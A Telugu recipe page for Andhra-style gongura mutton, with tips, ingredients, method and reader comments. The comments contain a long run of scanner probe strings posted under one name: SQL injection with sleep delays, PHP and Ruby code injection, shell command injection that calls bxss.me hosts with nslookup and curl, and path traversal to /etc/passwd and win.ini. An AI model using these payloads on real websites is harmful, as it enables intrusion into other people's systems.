ఆంధ్రా స్పెషల్ గోంగూర మటన్

కారంగా ఘాటుగా పుల్లని గోంగూర మటన్ కలిపి ఉడికించి చేసే ఆంధ్రా స్టైల్ గోంగూర మటన్ చేసిన ప్రతీ ఇంటా పండుగలా అనిపిస్తుంది.

వేడిగా అన్నం, బగారా అన్నంతో ఎంతో రుచిగా ఉంటుంది గోంగూర మటన్.

గోంగూర మటన్ ఆంధ్రా తెలంగాణా రెండు ప్రాంతాల్లో ఎక్కువగా చేస్తారు, అందులోను ఆంధ్రులు ఎక్కువగా చేస్తారు. ఈ గోంగూర మటన్ చేయడం చాలా తేలిక, వేసేవి కూడా కొన్ని పదార్ధాలే. మాంసం మెత్తగా ఉడికి సరైన మోతాదులో ఉప్పు కారాలుంటే చాలు, పర్ఫెక్ట్ గోంగూర మటన్ తయారు.

గోంగూర మాంసం రెసిపీ తెలుగు వారందరూ దాదాపుగా ఒకే తీరులోనే చేస్తారు, ప్రాంతాన్ని బట్టి వేసే పదార్ధాల కొలతల్లో చిన్న మార్పులుంటాయి అంతే! నేను గుంటూరు స్టైల్ గోంగూర మటన్ చేస్తున్నాను, ఇది పూర్తిగా వెనుకటి తీరు.

రెస్టారెంట్స్ తీరు గోంగూర మాంసం అంటే కాస్త పలుచగా ఉంటుంది, పైగా రెస్టరెంట్స్లో మాంసాన్ని విడిగా ఉడికించి గోంగూరని విడిగా ఉడికించి ఆర్డర్ వచ్చిన వెంటనే ఉప్పు కారాలు కలిపి వేడి చేసి ఇస్తారు. ఆ తీరులో చేసే మాంసానికి గోంగూర పులుపు పట్టదు. మాంసం చప్పగా ఉంటుంది.

నేను చేసే గోంగూర మటన్ కాస్త టైం పడుతుంది కానీ కచ్చితమైన రుచిని మీరు ఆస్వాదించగలుగుతారు!

Andhra Special Gongura Mutton | Mutton Curry

టిప్స్

మాంసం :

లేత మాంసం ఎముకలతో ఉన్నది అయితే రుచి చాలా బాగుంటుంది. ముక్కలు మీడియం సైజు ఉండాలి. మరీ చిన్నవి అయితే కూర తయారయ్యేపాటికి ఇంకా చిన్నవిగా అయిపోతాయి.

నూనె:

గోంగూర మాంసానికి నూనె కాస్త ఎక్కువగానే పడుతుంది. నూనె ఉంటేనే జిగురుగా ఉండే గోంగూర నూనెలో మగ్గి రుచిగా ఉంటుంది కూర. అయినా మాంసం కూరలకి నూనె ఉంటేనే రుచి.

గోంగూర:

  1. గోంగూర రెండు రకాలు ఎర్ర గోంగూర, తెల్ల గోంగూర. ఎర్ర గోంగూర తెల్ల గోంగూర కంటే కాస్త ఎక్కువ పుల్లగా ఉంటుంది, సాధారణంగా ఈ ఎర్ర గోంగూర పచ్చళ్ళకి వాడతారు.

  2. మీరు తెల్ల గోంగూర వాడుతున్నట్లైతే కొద్దిగా చింతపండు వేసుకుంటే పులుపు సరిపోతుంది.

  3. గోంగూర ఆకులు మాత్రమే వాడాలి. ఆకులు వోలిచాక కచ్చితంగా 2-3 సార్లు నీళ్లలో వేసి బాగా కడగాలి, లేదంటే గోంగూరలో ఉండే ఇసుక వదలదు.

కూర మాంచి రుచి కోసం:

మాంసం విడిగా నిదానంగా ఉడికితేనే ఎంతో రుచిగా ఉంటుంది. నిజమే సుమారుగా గంట సేపు మాంసం ఉడకడానికే పడుతుంది, కానీ ఈ రుచి కుక్కర్లో నీళ్లు పోసి వండితే రాదు.

కుక్కర్లో అయితే ఇలా చేయండి:

సమయం తక్కువగా ఉన్నవారు కుక్కర్లో 750ml నీరు పోసి మీడియం ఫ్లేమ్ మీదే ఉడికించి మిగిలిన పద్ధతిలో చేసుకోండి.

ఆంధ్రా స్పెషల్ గోంగూర మటన్ - రెసిపీ వీడియో

Andhra Style Gongura Mutton | Mutton Curry | How to Make Gongura Mutton

Mutton Recipes | nonvegetarian
  • Prep Time 5 mins
  • Cook Time 1 hr 30 mins
  • Total Time 1 hr 35 mins
  • Servings 5

కావాల్సిన పదార్ధాలు

  • గోంగూర మటన్ మసాలా పొడి కోసం:
  • 2 tbsp ధనియాలు
  • 1 tsp జీలకర్ర
  • 2 Inch దాల్చిన చెక్క
  • 5 లవంగాలు
  • 1 tbsp మిరియాలు
  • 5 ఎండు మిర్చి
  • 12 -15 వెల్లులి (చిన్నవి)
  • కూర కోసం
  • 1/2 cup నూనె
  • 1/2 Kilo మాంసం
  • 250 gms ఎర్ర గోంగూర
  • 1 liter నీళ్లు
  • ఉప్పు
  • 2 tsp కారం
  • కరివేపాకు - ఒక రెబ్బ
  • 1 cup ఉల్లిపాయ ముక్కలు
  • 2 tbsp అల్లం వెల్లులి ముద్ద
  • 1/4 tsp పసుపు
  • 3 tbsp వెల్లులి తరుగు (ఆఖరున వేయడానికి)

విధానం

  1. మూకుడులో ¼ కప్పు నూనె వేడి చేసి అందులో ఉల్లిపాయ తరుగు, అల్లం వెల్లులి ముద్ద, పసుపు మాంసం, నీళ్లు, కారం, ఉప్పు వేసి బాగా కలిపి మూత పెట్టి మీడియం ఫ్లేమ్ మీద మాంసం మెత్తగా ఉడికేదాకా మాధ్యమధ్యన కలుపుతూ ఉడికించుకోవాలి. (అవసరమైతే కాసిని నీళ్లు పోసుకోండి, ఇంకా కుక్కర్లో వండే తీరు కోసం టిప్స్ చుడండి).
  2. మాంసం ఉడికే లోపు మసాలా పొడి కోసం ఉంచిన పదార్ధాలన్నీ వేసి సన్నని సెగ మీద మాంచి సువాసన వచ్చే దాకా వేపుకోవాలి. ఆఖరున పొట్టు తీసిన వెల్లులి వేసి కలిపి మిక్సీలో వేసి మెత్తని పొడి చేసుకోండి.
  3. సుమారుగా గంట తరువాత మాంసం మెత్తగా ఉడికి ఇంకా ఇలా కాస్త గ్రేవీతో ఉంటుంది అప్పుడు మిగిలిన నూనె కడిగిన ఎర్ర గోంగూర వేసి ఆకు మెత్తబడే దాకా కలుపుకోవాలి.
  4. ఆకు మెత్తుగా అయ్యాక వెల్లులి తరుగు మాంసం మసాలా కారం పొడి వేసి కలిపి మూత పెట్టి మీడియం ఫ్లేమ్ మీద నూనె పైకి తేలేదాక ఉడకనివ్వాలి.
  5. నూనె పైకి తేలాక దింపేసుకుని వేడి వేడిగా అన్నంతో సర్వ్ చేసుకోండి.

Leave a comment

Rate this Recipe:
Your email address will not be published.

98 comments

  • M
    Mubeena Sharif
    Recipe Rating:
    Super recipe sir ❤️....... Cooking Rani Varu easy ga nerchukunela post chsthunnaru👏.......me recipes mottam chala easy method lo ardham ayye vidhanam la cheptharu😍.....
  • M
    Mohammad Naveed
    Recipe Rating:
    Wow
  • S
    Sushil Kumar Rachuri
    Recipe Rating:
    Wah wha! Kya lajawab hai guru
  • K
    Kummari shireesha
    Recipe Rating:
    Wowww ..yummy ga vachindi andi yeaster I tried this recipe andaru chala mechukunnadu thank you Andi
  • S
    Shaik vali
    Recipe Rating:
    Loved your recipes sir I want to try this recipe definitely tq
  • S
    Shaik sharif
    Recipe Rating:
    Thank you for the recipe sir I tried and it came out well
  • S
    Shaik sharif
    Recipe Rating:
    Thank you for the recipe sir I tried and it came out well
  • S
    Shaik sharif
    Recipe Rating:
    Thank you for the recipe sir I tried and it came out well
  • M
    Madhu
    Recipe Rating:
    I love your recipes and the way you tell them and mostly the tips you give.
    • K
      kEMlzpAX
      Recipe Rating:
      @@MdOOS
    • K
      kEMlzpAX
      Recipe Rating:
      1????%2527%2522\'\"
    • K
      kEMlzpAX
      Recipe Rating:
      1'"
    • K
      kEMlzpAX
      Recipe Rating:
      1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
    • K
      kEMlzpAX
      Recipe Rating:
      1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
    • K
      kEMlzpAX
      Recipe Rating:
      13AqQIzEX')) OR 928=(SELECT 928 FROM PG_SLEEP(15))--
    • K
      kEMlzpAX
      Recipe Rating:
      1sEiZKJvY') OR 641=(SELECT 641 FROM PG_SLEEP(15))--
    • K
      kEMlzpAX
      Recipe Rating:
      10KRGlgGa' OR 557=(SELECT 557 FROM PG_SLEEP(15))--
    • K
      kEMlzpAX
      Recipe Rating:
      1-1)) OR 256=(SELECT 256 FROM PG_SLEEP(15))--
    • K
      kEMlzpAX
      Recipe Rating:
      1-1) OR 44=(SELECT 44 FROM PG_SLEEP(15))--
    • K
      kEMlzpAX
      Recipe Rating:
      1-1 OR 76=(SELECT 76 FROM PG_SLEEP(15))--
    • K
      kEMlzpAX
      Recipe Rating:
      1f5ajJfPo'; waitfor delay '0:0:15' --
    • K
      kEMlzpAX
      Recipe Rating:
      1-1 waitfor delay '0:0:15' --
    • K
      kEMlzpAX
      Recipe Rating:
      1-1); waitfor delay '0:0:15' --
    • K
      kEMlzpAX
      Recipe Rating:
      1-1; waitfor delay '0:0:15' --
    • K
      kEMlzpAX
      Recipe Rating:
      (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
    • K
      kEMlzpAX
      Recipe Rating:
      10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z
    • K
      kEMlzpAX
      Recipe Rating:
      10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z
    • K
      kEMlzpAX
      Recipe Rating:
      1*if(now()=sysdate(),sleep(15),0)
    • K
      kEMlzpAX
      Recipe Rating:
      -1 OR 3+620-620-1=0+0+0+1
    • K
      kEMlzpAX
      Recipe Rating:
      -1 OR 2+620-620-1=0+0+0+1
    • K
      kEMlzpAX
      Recipe Rating:
      1*1
    • K
      kEMlzpAX
      Recipe Rating:
      1*1
    • K
      kEMlzpAX
      Recipe Rating:
      1*1
    • K
      kEMlzpAX
      Recipe Rating:
      1*1
    • K
      kEMlzpAX
      Recipe Rating:
      19BzXDBbo
    • K
      kEMlzpAX
      Recipe Rating:
      [php]print(md5(31337));[/php]
    • K
      kEMlzpAX
      Recipe Rating:
      {php}print(md5(31337));{/php}
    • K
      kEMlzpAX
      Recipe Rating:
      print(md5(31337));//
    • K
      kEMlzpAX
      Recipe Rating:
      '{${print(md5(31337))}}'
    • K
      kEMlzpAX
      Recipe Rating:
      '.print(md5(31337)).'
    • K
      kEMlzpAX
      Recipe Rating:
      ${@print(md5(31337))}\
    • K
      kEMlzpAX
      Recipe Rating:
      ${@print(md5(31337))}
    • K
      kEMlzpAX
      Recipe Rating:
      ";print(md5(31337));$a="
    • K
      kEMlzpAX
      Recipe Rating:
      ';print(md5(31337));$a='
    • K
      kEMlzpAX
      Recipe Rating:
      ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
    • K
      kEMlzpAX
      Recipe Rating:
      gethostbyname(lc('hitih'.'kqqdihjx6dd4e.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(112).chr(87).chr(119).chr(68)
    • K
      kEMlzpAX
      Recipe Rating:
      ".gethostbyname(lc("hitbr"."wsiqfslb1f346.bxss.me."))."A".chr(67).chr(hex("58")).chr(117).chr(83).chr(114).chr(78)."
    • K
      kEMlzpAX
      Recipe Rating:
      '.gethostbyname(lc('hitie'.'hffiqdap1c91d.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(118).chr(66).chr(104).chr(78).'
    • K
      kEMlzpAX
      Recipe Rating:
      ./1
    • K
      kEMlzpAX
      Recipe Rating:
      ../1
    • K
      kEMlzpAX
      Recipe Rating:
      file:///etc/passwd
    • K
      kEMlzpAX
      Recipe Rating:
      '"
    • K
      kEMlzpAX
      Recipe Rating:
      https://vismaifood.com/
    • K
      kEMlzpAX
      Recipe Rating:
      vismaifood.com
    • K
      kEMlzpAX
      Recipe Rating:
      )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
    • K
      kEMlzpAX
      Recipe Rating:
      xfs.bxss.me
    • K
      kEMlzpAX
      Recipe Rating:
      andhra-style-gongura-mutton-mutton-curry-how-to-make-gongura-mutton/.
    • K
      kEMlzpAX
      Recipe Rating:
      andhra-style-gongura-mutton-mutton-curry-how-to-make-gongura-mutton
    • K
      kEMlzpAX
      Recipe Rating:
      ;(nslookup -q=cname hitxaxdyduxwncd30a.bxss.me||curl hitxaxdyduxwncd30a.bxss.me)|(nslookup -q=cname hitxaxdyduxwncd30a.bxss.me||curl hitxaxdyduxwncd30a.bxss.me)&(nslookup -q=cname hitxaxdyduxwncd30a.bxss.me||curl hitxaxdyduxwncd30a.bxss.me)
    • K
      kEMlzpAX
      Recipe Rating:
      andhra-style-gongura-mutton-mutton-curry-how-to-make-gongura-mutton
    • K
      kEMlzpAX
      Recipe Rating:
      `(nslookup -q=cname hitqqydxebpyme832f.bxss.me||curl hitqqydxebpyme832f.bxss.me)`
    • K
      kEMlzpAX
      Recipe Rating:
      |(nslookup -q=cname hitpeggsjaqmw6e8fd.bxss.me||curl hitpeggsjaqmw6e8fd.bxss.me)
    • K
      kEMlzpAX
      Recipe Rating:
      &(nslookup -q=cname hitkncjdqjymbdd6df.bxss.me||curl hitkncjdqjymbdd6df.bxss.me)&'\"`0&(nslookup -q=cname hitkncjdqjymbdd6df.bxss.me||curl hitkncjdqjymbdd6df.bxss.me)&`'
    • K
      kEMlzpAX
      Recipe Rating:
      &nslookup -q=cname hitegdmvjepqo66317.bxss.me&'\"`0&nslookup -q=cname hitegdmvjepqo66317.bxss.me&`'
    • K
      kEMlzpAX
      Recipe Rating:
      1"||sleep(27*1000)*zojdjb||"
    • K
      kEMlzpAX
      Recipe Rating:
      $(nslookup -q=cname hitpqkqpaizwab44d1.bxss.me||curl hitpqkqpaizwab44d1.bxss.me)
    • K
      kEMlzpAX
      Recipe Rating:
      (nslookup -q=cname hitxdsvyqtjkoc77c7.bxss.me||curl hitxdsvyqtjkoc77c7.bxss.me))
    • K
      kEMlzpAX
      Recipe Rating:
      1'||sleep(27*1000)*wwqrcx||'
    • K
      kEMlzpAX
      Recipe Rating:
      1"&&sleep(27*1000)*mslgct&&"
    • K
      kEMlzpAX
      Recipe Rating:
      1|echo dyoouz$()\ jzctuj\nz^xyu||a #' |echo dyoouz$()\ jzctuj\nz^xyu||a #|" |echo dyoouz$()\ jzctuj\nz^xyu||a #
    • K
      kEMlzpAX
      Recipe Rating:
      1'&&sleep(27*1000)*qwvdol&&'
    • K
      kEMlzpAX
      Recipe Rating:
      |echo xyujpq$()\ tpmpsi\nz^xyu||a #' |echo xyujpq$()\ tpmpsi\nz^xyu||a #|" |echo xyujpq$()\ tpmpsi\nz^xyu||a #
    • K
      kEMlzpAX
      Recipe Rating:
      'A'.concat(70-3).concat(22*4).concat(112).concat(71).concat(101).concat(65)+(require'socket' Socket.gethostbyname('hitbn'+'iwfnhewn31a0b.bxss.me.')[3].to_s)
    • K
      kEMlzpAX
      Recipe Rating:
      1&echo bqpgld$()\ hgvxsa\nz^xyu||a #' &echo bqpgld$()\ hgvxsa\nz^xyu||a #|" &echo bqpgld$()\ hgvxsa\nz^xyu||a #
    • K
      kEMlzpAX
      Recipe Rating:
      '"()
    • K
      kEMlzpAX
      Recipe Rating:
      &echo borawj$()\ nzcjep\nz^xyu||a #' &echo borawj$()\ nzcjep\nz^xyu||a #|" &echo borawj$()\ nzcjep\nz^xyu||a #
    • K
      kEMlzpAX
      Recipe Rating:
      '+'A'.concat(70-3).concat(22*4).concat(117).concat(76).concat(114).concat(80)+(require'socket' Socket.gethostbyname('hitct'+'rsalggai3f8fc.bxss.me.')[3].to_s)+'
    • K
      kEMlzpAX
      Recipe Rating:
      echo exiokk$()\ blmohk\nz^xyu||a #' &echo exiokk$()\ blmohk\nz^xyu||a #|" &echo exiokk$()\ blmohk\nz^xyu||a #
    • K
      kEMlzpAX
      Recipe Rating:
      "+"A".concat(70-3).concat(22*4).concat(112).concat(85).concat(122).concat(72)+(require"socket" Socket.gethostbyname("hitkx"+"qciobgor0c2d6.bxss.me.")[3].to_s)+"
    • K
      kEMlzpAX
      Recipe Rating:
      ^(#$!@#$)(()))******
    • K
      kEMlzpAX
      Recipe Rating:
      !(()&&!|*|*|
    • K
      kEMlzpAX
      Recipe Rating:
      bxss.me
    • K
      kEMlzpAX
      Recipe Rating:
      c:/windows/win.ini
    • K
      kEMlzpAX
      Recipe Rating:
      ../../../../../../../../../../../../../../etc/shells
    • K
      kEMlzpAX
      Recipe Rating:
      /etc/shells
    • K
      kEMlzpAX
      Recipe Rating:
      http://bxss.me/t/fit.txt?.jpg
    • K
      kEMlzpAX
      Recipe Rating:
      Http://bxss.me/t/fit.txt
    • K
      kEMlzpAX
      Recipe Rating:
      1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
    • K
      kEMlzpAX
      Recipe Rating:
      http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
    • K
      kEMlzpAX
      Recipe Rating:
      1&n972004=v989048
    • K
      kEMlzpAX
      Recipe Rating:
      12345'"\'\");|]*{ ?''💡
    • K
      kEMlzpAX
      Recipe Rating:
      ${10000485+9999976}
    • K
      kEMlzpAX
      Recipe Rating:
      mrnWoOwC: ahPpWSUV
    • K
      kEMlzpAX
      Recipe Rating:
      TjNQ2YU5
    • K
      kEMlzpAX
      Recipe Rating:
      "+response.write(9318653*9732114)+"
    • K
      kEMlzpAX
      Recipe Rating:
      '+response.write(9318653*9732114)+'
    • K
      kEMlzpAX
      Recipe Rating:
      response.write(9318653*9732114)
  • M
    Mary Mendonca
    Recipe Rating:
    Must prepare this mutton dish. Thank you sharing
Andhra Special Gongura Mutton | Mutton Curry